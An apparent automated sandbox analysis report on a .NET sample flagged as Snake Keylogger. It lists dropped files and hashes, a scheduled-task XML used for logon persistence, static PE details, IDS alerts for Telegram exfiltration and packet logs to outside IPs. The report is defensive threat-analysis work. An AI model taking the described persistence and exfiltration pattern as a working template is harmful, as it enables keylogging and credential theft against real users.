C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rPO0977-6745.exe.log

Download File

Process:	C:\Users\user\Desktop\rPO0977-6745.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.379552885213346
Encrypted:	false
SSDEEP:	48:fWSU4xympjgs4RIoU99tK8NPZHUl7u1iMuge//ZLv0Uyus:fLHxvCsIfA2KRHmOug4v1s
MD5:	AAAFFE79E3D18F230F56D8ECB5D839E8
SHA1:	3DD92E63FC45704ADDDEFEF47E1FEFDD0DC53CA1
SHA-256:	C3A29977F6AC4BAEE072027DA5835A69D3D90EA45EEE239E13A4493D4D745B34
SHA-512:	71CDEB6FC22E9E39752670E0F1C02ADCEC537B47A7955FB61AD4C44418379B17C108B8A01FFAB225F83B00408F26276B692EF3BA85FCFB21E5D94149739F9FE5
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ley3isf.vh3.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2jiszu5j.bcl.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5c0grjqc.amp.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ddap2fxj.pnj.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nrnefvhn.udn.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s4zpmwxp.xmh.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_um2plh5i.fqs.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w20wx3ac.dgs.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp44AD.tmp

Download File

Process:	C:\Users\user\Desktop\rPO0977-6745.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1607
Entropy (8bit):	5.117862021484575
Encrypted:	false
SSDEEP:	24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNttxvn:cgeHgYrFdOFzOzN33ODOiDdKrsuTzv
MD5:	69B03F7EFC65C7BE15442A77C775FA98
SHA1:	1C1A96B73B0EF8F24094B373D163F3B9E95BF0E0
SHA-256:	704B8A859F1023FFC53B3A3C533155570D58B93157577BF68FDDE47703AD70F9
SHA-512:	C557F0B173A18BCE2338C5073677915BDF3ED881BD0E740559D12734182563D891D26A8667F61950CFB497A9010C2F81B290FC030E05DAC14323503A068FFCB6
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.

C:\Users\user\AppData\Local\Temp\tmp547C.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1607
Entropy (8bit):	5.117862021484575
Encrypted:	false
SSDEEP:	24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNttxvn:cgeHgYrFdOFzOzN33ODOiDdKrsuTzv
MD5:	69B03F7EFC65C7BE15442A77C775FA98
SHA1:	1C1A96B73B0EF8F24094B373D163F3B9E95BF0E0
SHA-256:	704B8A859F1023FFC53B3A3C533155570D58B93157577BF68FDDE47703AD70F9
SHA-512:	C557F0B173A18BCE2338C5073677915BDF3ED881BD0E740559D12734182563D891D26A8667F61950CFB497A9010C2F81B290FC030E05DAC14323503A068FFCB6
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.

C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe

Download File

Process:	C:\Users\user\Desktop\rPO0977-6745.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	561664
Entropy (8bit):	7.960071259387184
Encrypted:	false
SSDEEP:	12288:oW2iNeSY+aZrwrrjk1tvGJfrJQS6hNeuugf5pvPN07R+ooqhMU:Z14/4rrjuFGJVN6Lugf/t6RVoql
MD5:	978148253C4B65B751FCD3CB4713F614
SHA1:	CBD9C5FEE022B52A38ABDEDD536D22310F1B0870
SHA-256:	C45DCE6C441601CF7FD1C78D7697B3F3A5B1D27041417EB0CA7F26E98CCF1DE9
SHA-512:	6B0D3A2FB5ABFD217C74F73DB630C766F5837955A8D75B210AF77E987BF4C6BDB7E29915A049A7FDECC8C238D71D2C22600002DF485E7A66A07C370F5ECC60D0
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 45%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...t+...............0.................. ........@.. ....................................@.................................d...O...................................\...p............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......LM..8Q......E....................................................0............}.....(.......(......r...p.(....(....o......{.....(....o......{....r...p.(....(....o......{.....(....o......{.....(....o......{.....(....o........0..`........(.........( ....o!...........,....t......o"...r-..p(#.....,...o".....+..(....o$...(%.....+....0...........(....o&...o'...o(....+.....0..;........(.........( ....o!...........,..r-..p.+....t....o)....+..*..0..;........(.........( ...

C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\rPO0977-6745.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.960071259387184
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.79% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Win16/32 Executable Delphi generic (2074/23) 0.01%
File name:	rPO0977-6745.exe
File size:	561'664 bytes
MD5:	978148253c4b65b751fcd3cb4713f614
SHA1:	cbd9c5fee022b52a38abdedd536d22310f1b0870
SHA256:	c45dce6c441601cf7fd1c78d7697b3f3a5b1d27041417eb0ca7f26e98ccf1de9
SHA512:	6b0d3a2fb5abfd217c74f73db630c766f5837955a8d75b210af77e987bf4c6bdb7e29915a049a7fdecc8c238d71d2c22600002df485e7a66a07c370f5ecc60d0
SSDEEP:	12288:oW2iNeSY+aZrwrrjk1tvGJfrJQS6hNeuugf5pvPN07R+ooqhMU:Z14/4rrjuFGJVN6Lugf/t6RVoql
TLSH:	44C4234B72B94724C9BC47F9185029288377A82A6872E6970DDC1DCE3F33F459291BA7
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...t+................0.................. ........@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x48a7b6
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x92C42B74 [Sat Jan 11 04:28:36 2048 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8a764	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x8c000	0x5bc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8e000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x88c5c	0x70	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x887bc	0x88800	6561b6429af4faf63ad7c4e7d569f1ee	False	0.9626312814789377	OpenPGP Public Key	7.966999305787785	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x8c000	0x5bc	0x600	15bd1a4bd44ca7454290f2b390c3bdf2	False	0.4231770833333333	data	4.108214047831133	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x8e000	0xc	0x200	f6d459c18e0ad04cc0eba57869f14ef0	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x8c090	0x32c	data			0.4273399014778325
RT_MANIFEST	0x8c3cc	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-24T15:08:36.970823+0200	TCP	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	49735	443	192.168.2.7	149.154.167.220
2024-07-24T15:08:44.499518+0200	TCP	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	49741	443	192.168.2.7	149.154.167.220

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 24, 2024 15:08:19.046171904 CEST	49702	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:19.051496983 CEST	80	49702	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:19.051568985 CEST	49702	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:19.051763058 CEST	49702	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:19.056691885 CEST	80	49702	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:19.649775028 CEST	80	49702	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:19.665044069 CEST	49702	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:19.671444893 CEST	80	49702	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:19.824407101 CEST	80	49702	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:19.878443003 CEST	49702	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:19.883709908 CEST	49704	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:19.883766890 CEST	443	49704	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:19.884085894 CEST	49704	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:19.896883011 CEST	49704	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:19.896898031 CEST	443	49704	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:20.372170925 CEST	443	49704	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:20.372301102 CEST	49704	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:20.378355980 CEST	49704	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:20.378395081 CEST	443	49704	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:20.378737926 CEST	443	49704	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:20.425307035 CEST	49704	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:20.444772959 CEST	49704	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:20.488506079 CEST	443	49704	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:20.559813023 CEST	443	49704	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:20.559896946 CEST	443	49704	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:20.559958935 CEST	49704	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:20.566076040 CEST	49704	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:20.601377964 CEST	49702	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:20.606905937 CEST	80	49702	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:20.756690979 CEST	80	49702	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:20.764653921 CEST	49705	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:20.764753103 CEST	443	49705	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:20.764838934 CEST	49705	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:20.765067101 CEST	49705	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:20.765100956 CEST	443	49705	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:20.800280094 CEST	49702	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:21.274315119 CEST	443	49705	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:21.286633015 CEST	49705	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:21.286720037 CEST	443	49705	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:21.419337034 CEST	443	49705	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:21.419559956 CEST	443	49705	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:21.419641018 CEST	49705	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:21.420048952 CEST	49705	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:21.423787117 CEST	49702	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:21.424870014 CEST	49706	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:21.431811094 CEST	80	49702	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:21.431858063 CEST	80	49706	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:21.431910992 CEST	49702	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:21.431967020 CEST	49706	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:21.432101011 CEST	49706	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:21.438291073 CEST	80	49706	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:22.064829111 CEST	80	49706	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:22.067312002 CEST	49707	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:22.067358017 CEST	443	49707	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:22.070004940 CEST	49707	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:22.070269108 CEST	49707	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:22.070281982 CEST	443	49707	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:22.112791061 CEST	49706	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:22.457161903 CEST	80	49706	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:22.457371950 CEST	49706	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:22.458261967 CEST	80	49706	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:22.458373070 CEST	49706	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:22.941356897 CEST	443	49707	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:22.942780018 CEST	49707	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:22.942814112 CEST	443	49707	188.114.97.3	192.168.2.7
